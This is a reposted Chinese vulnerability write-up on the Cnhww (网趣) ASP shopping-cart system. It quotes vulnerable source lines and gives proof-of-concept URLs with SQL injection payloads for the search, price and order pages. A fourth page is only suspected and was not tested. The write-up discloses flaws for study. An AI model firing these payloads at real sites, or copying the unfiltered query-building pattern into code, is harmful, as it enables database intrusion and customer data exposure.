来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 版本:网趣网上购物系统旗舰版(免费版)下载:http://www.cnhww.com/down.asp?id=6----------------------------------------------------------------------第一处:/research.asp对selectname未进行任何过滤,造成......
|
版本:网趣网上购物系统旗舰版(免费版)
下载:http://www.cnhww.com/down.asp?id=6 ---------------------------------------------------------------------- 第一处: /research.asp 对selectname未进行任何过滤,造成搜索型注入 code: 7-12行 dim action,searchkey,anclassid,jiage,selectname anclassid=request("anclassid") searchkey=request("searchkey") jiage=request("jiage") action=request("action") selectname=request("selectname") //获取selectname,中间无任何过滤212-230行 if anclassid<>0 then select case action case "1" sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" " case "2" sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" " case "3" sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" " end select else select case action case "1" sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " case "2" sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " //我利用的是此处 case "3" sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " end select end if234行 rs.open "select * from products where "&sql1&" and zhuangtai=0 order by adddate desc",conn,1,1构造: http://www.2cto.com /research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'=' -------------------------------------------------------------------- 第二处: /price.asp 对anid未进行任何过滤,造成数字型注入 code: 74行: anid=trim(request("anid")) //获取anid,中间无任何过滤104行: if anid<>"" then rs.open "select * from products where anclassid="&anid&" order by adddate desc",conn,1,1构造: http://127.0.0.1:8080/price.asp?anid=62 and 1=1 --------------------------------------------------------------------- 第三处: /order.asp 对dan未进行任何过滤,造成字符型注入 code: 64行: dingdan=request.QueryString("dan") //获取dan,中间无任何过滤66行: rs.open "select products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex, orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liu yan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodi zhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1构造: 下笔订单先,否者无法利用 http://127.0.0.1:8080/order.asp?dan=201277143453' and '1'='1 ---------------------------------------------------------------------- 第四处: /my_msg.asp 对delid未进行任何过滤(我用的免费版,无法测试,不过有很大可能存在该漏洞) ---------------------------------------------------------------------- 转自:90sec.org |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
